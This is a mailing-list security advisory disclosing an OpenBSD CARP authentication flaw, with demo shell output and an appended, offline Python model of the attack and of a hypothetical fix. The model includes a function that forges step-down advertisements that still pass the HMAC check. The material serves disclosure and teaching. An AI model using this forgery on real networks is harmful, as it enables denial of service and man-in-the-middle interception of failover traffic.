Date: Sat, 18 Dec 2010 15:08:05 +1300
From: Sam Banks <wolfie@...ogeny.ac.nz>
To: full-disclosure@...ts.grok.org.uk
Subject: OpenBSD CARP Hash Vulnerability

Hello FD,

I disclosed this bug to the BSDs and no one is interested in fixing it so
here you go. The two files attached are as follows:

* scapy-carp.patch - A patch against the latest Scapy (currently 2.1.0) so
it understands the CARP protocol. The PoC won't work without the patch.
* carp-poc.py - A very quick and dirty PoC which will force all CARP nodes
into backup mode. You need to be on the same Layer 2 as the CARP nodes. Also
make sure you have the correct interface selected.

Happy hacking,

wolfie

==============
VULNERABILITY DETAILS
==============

The OpenBSD CARP implementation (and all derivatives, such as FreeBSD and
NetBSD) fails to include all fields contained in the "carp_header"
structure[1] when calculating the SHA-1 HMAC of the packet in the
function carp_proto_input_c[2]. The two 8-bit fields not included in the
hash generation are "carp_advskew" and "carp_advbase". Among other uses,
both fields are set to 255 by the master CARP node to indicate that it
wants to step down from the master role.

This behaviour can be exploited to force a backup member to assume the role
of master by capturing a master CARP advertisement, updating the two fields
in question to 255 and replaying the modified packet. A backup node will
receive this packet and the hash check will be satisfied as the two modified
fields are not included in the hash generation. A backup node will now
assume the master role and the current master will step down to backup.

At this point, the attacker can capture an advertisement from the new
master. By replaying both of the unmodified master advertisements, all CARP
nodes assume the backup role. A Denial of Service (DoS) condition has now
been introduced, as no device answers ARP requests for the Virtual IP
(VIP). The attacker can then decide whether to start answering ARP for the
VIP, thereby performing a Man in the Middle (MitM) attack.

[1] http://www.openbsd.org/cgi-bin/cvsweb/src/sys/netinet/ip_carp.h?rev=1.28
[2] http://www.openbsd.org/cgi-bin/cvsweb/src/sys/netinet/ip_carp.c?rev=1.179

================
DEMO OF ATTACHED CODE
================

---------------------------
MASTER CARP NODE
---------------------------
# uname -a; id
OpenBSD ipsec.carpdemo 4.8 GENERIC#136 i386
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty),
5(operator), 20(staff), 31(guest)
# ifconfig carp0 create carpdev vic0 pass supersecretpassword vhid 50 state master carppeer 192.168.252.138 192.168.50.1/24
# ifconfig carp0
carp0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
        lladdr 00:00:5e:00:01:32
        priority: 0
        carp: MASTER carpdev vic0 vhid 50 advbase 1 advskew 0 carppeer 192.168.252.138
        groups: carp
        status: master
        inet6 fe80::200:5eff:fe00:132%carp0 prefixlen 64 scopeid 0x5
        inet 192.168.50.1 netmask 0xffffff00 broadcast 192.168.50.255
# ifconfig carp0
carp0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
        lladdr 00:00:5e:00:01:32
        priority: 0
        carp: BACKUP carpdev vic0 vhid 50 advbase 1 advskew 0 carppeer 192.168.252.138
        groups: carp
        status: backup
        inet6 fe80::200:5eff:fe00:132%carp0 prefixlen 64 scopeid 0x5
        inet 192.168.50.1 netmask 0xffffff00 broadcast 192.168.50.255
#

---------------------------
BACKUP CARP NODE
---------------------------

# uname -a; id
OpenBSD backdoor.carpdemo 4.8 GENERIC#136 i386
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty),
5(operator), 20(staff), 31(guest)
# ifconfig carp0 create carpdev vic0 pass supersecretpassword vhid 50 state backup carppeer 192.168.252.137 192.168.50.1/24
# ifconfig carp0
carp0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
        lladdr 00:00:5e:00:01:32
        priority: 0
        carp: BACKUP carpdev vic0 vhid 50 advbase 1 advskew 0 carppeer 192.168.252.137
        groups: carp
        status: backup
        inet6 fe80::200:5eff:fe00:132%carp0 prefixlen 64 scopeid 0x5
        inet 192.168.50.1 netmask 0xffffff00 broadcast 192.168.50.255
# ifconfig carp0
carp0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
        lladdr 00:00:5e:00:01:32
        priority: 0
        carp: BACKUP carpdev vic0 vhid 50 advbase 1 advskew 0 carppeer 192.168.252.137
        groups: carp
        status: backup
        inet6 fe80::200:5eff:fe00:132%carp0 prefixlen 64 scopeid 0x5
        inet 192.168.50.1 netmask 0xffffff00 broadcast 192.168.50.255
#

------------------------------
ATTACKERS COMPUTER
------------------------------

root@...umatic:/files/tools# ./carp-poc.py
WARNING: No route found for IPv6 destination :: (no default route?)
[*] capturing current master's advertisement
[*] forcing failover of master
[*] waiting for new master to be elected
[*] capturing new master's advertisement
[*] replaying both captured packets


View attachment "scapy-carp.patch" of type "text/x-patch" (2867 bytes)

View attachment "carp-poc.py" of type "text/x-python" (961 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
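The HMAC gap described under VULNERABILITY DETAILS above, as an added example from the editor (not the advisory's carp-poc.py, its Scapy patch, or OpenBSD's ip_carp.c): Python that builds a CARP advertisement, verifies it the way a receiving node would (unkeyed checksum first, then the keyed SHA-1 HMAC), applies the advisory's edit of carp_advbase and carp_advskew to 255, and shows that the captured digest still verifies while the BACKUP-state timer comparison then declares the master dead. The HMAC message order (version, type, vhid, virtual IPv4 addresses in ascending order, then the replay counter), the 20-byte zero-padded key, the checksum handling and the cover_timing variant that folds the two fields into the keyed message are my reading of the referenced source and a hypothetical hardening, not anything stated on the page; the packet bytes, key usage and counter are constructed here, not captured.

```python
# Added example (editor's code, not the advisory's PoC or OpenBSD's ip_carp.c).
# Assumptions: HMAC message layout as I read carp_hmac_prepare()/carp_hmac_generate();
# cover_timing=True is a hypothetical fix, not a shipped patch; all bytes are constructed.
import hashlib
import hmac
import ipaddress
import struct

CARP_VERSION = 2
CARP_ADVERTISEMENT = 1
CARP_AUTHLEN = 7            # 32-bit words of counter + digest (8 + 20 bytes)
CARP_KEY_LEN = 20
HDR_LEN = 36                # 8 fixed bytes + 8-byte counter + 20-byte SHA-1 digest
# vers/type, vhid, advskew, authlen, demote, advbase, cksum (OpenBSD carp_header order)
FIXED = struct.Struct("!BBBBBBH")


def carp_cksum(data):
    """Unkeyed Internet checksum (ones-complement sum), like carp_cksum(); 0 means valid."""
    if len(data) % 2:
        data += b"\0"
    s = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while s >> 16:
        s = (s & 0xFFFF) + (s >> 16)
    return (~s) & 0xFFFF


def carp_hmac(key, vhid, addrs, counter, timing=None):
    """Keyed digest. Kernel order (as I read it): version, type, vhid, IPv4 virtual
    addresses ascending, counter. timing=(advbase, advskew) is the hypothetical fix."""
    msg = bytes([CARP_VERSION, CARP_ADVERTISEMENT, vhid])
    for addr in sorted(addrs, key=lambda x: int(ipaddress.IPv4Address(x))):
        msg += ipaddress.IPv4Address(addr).packed
    if timing is not None:
        msg += bytes(timing)
    msg += counter
    # the kernel copies the pass into a zeroed 64-byte pad; zero-padding a short
    # key is exactly what standard HMAC does, so hmac.new() reproduces it
    k = key[:CARP_KEY_LEN].ljust(CARP_KEY_LEN, b"\0")
    return hmac.new(k, msg, hashlib.sha1).digest()


def build_adv(key, vhid, addrs, counter, advbase, advskew, demote=0, cover_timing=False):
    """Construct an advertisement the way a master would send it."""
    md = carp_hmac(key, vhid, addrs, counter, (advbase, advskew) if cover_timing else None)
    fixed = FIXED.pack((CARP_VERSION << 4) | CARP_ADVERTISEMENT, vhid, advskew,
                       CARP_AUTHLEN, demote, advbase, 0)
    body = fixed + counter + md
    return body[:6] + struct.pack("!H", carp_cksum(body)) + body[8:]


def parse_adv(pkt):
    vt, vhid, advskew, authlen, demote, advbase, cksum = FIXED.unpack(pkt[:8])
    return {"version": vt >> 4, "type": vt & 0xF, "vhid": vhid, "advskew": advskew,
            "authlen": authlen, "demote": demote, "advbase": advbase,
            "cksum": cksum, "counter": pkt[8:16], "md": pkt[16:HDR_LEN]}


def verify_adv(pkt, key, addrs, cover_timing=False):
    """Receive-side checks in kernel order: header sanity, checksum, then HMAC."""
    h = parse_adv(pkt)
    if h["version"] != CARP_VERSION or h["type"] != CARP_ADVERTISEMENT:
        return False
    if carp_cksum(pkt[:HDR_LEN]) != 0:
        return False
    timing = (h["advbase"], h["advskew"]) if cover_timing else None
    return hmac.compare_digest(h["md"], carp_hmac(key, h["vhid"], addrs, h["counter"], timing))


def forge_stepdown(pkt):
    """The advisory's attacker step: keep the captured digest, set advbase and advskew
    to 255, then recompute the unkeyed checksum so the packet still passes carp_cksum()."""
    p = bytearray(pkt)
    p[2] = 255            # carp_advskew
    p[5] = 255            # carp_advbase
    p[6:8] = b"\0\0"
    p[6:8] = struct.pack("!H", carp_cksum(bytes(p[:HDR_LEN])))
    return bytes(p)


def backup_reaction(own_advbase, own_advskew, adv, preempt=False):
    """BACKUP-state branch of carp_proto_input_c: timercmp() on (advbase, advskew)."""
    sc, ch = (own_advbase, own_advskew), (adv["advbase"], adv["advskew"])
    if preempt and sc < ch:                  # we advertise faster; preempt the master
        return "master_down"
    if (own_advbase * 3, own_advskew) < ch:  # master would time out anyway: treat as down
        return "master_down"
    return "stay_backup"


def demo():
    key = b"supersecretpassword"                       # the pass from the advisory's demo
    vhid, addrs = 50, ["192.168.50.1"]                 # vhid 50 and the VIP from the demo
    counter = struct.pack("!Q", 0x0102030405060708)    # constructed replay counter
    captured = build_adv(key, vhid, addrs, counter, advbase=1, advskew=0)
    forged = forge_stepdown(captured)
    fixed = build_adv(key, vhid, addrs, counter, advbase=1, advskew=0, cover_timing=True)
    return {
        "captured_valid": verify_adv(captured, key, addrs),
        "forged_valid": verify_adv(forged, key, addrs),            # True: the bug
        "digest_unchanged": captured[16:] == forged[16:],
        "on_captured": backup_reaction(1, 0, parse_adv(captured)),  # stay_backup
        "on_forged": backup_reaction(1, 0, parse_adv(forged)),      # master_down
        "fixed_captured_valid": verify_adv(fixed, key, addrs, cover_timing=True),
        "fixed_forged_valid": verify_adv(forge_stepdown(fixed), key, addrs, cover_timing=True),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

One thing the advisory leaves implicit and the example makes visible: an attacker cannot just flip the two bytes and replay, because the checksum over the whole header would then fail; that checksum is unkeyed, so forge_stepdown() recomputes it, and the keyed digest never has to change. Layer 2 adjacency is still required, as the original post says, since the receiver drops advertisements whose IP TTL is not 255.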
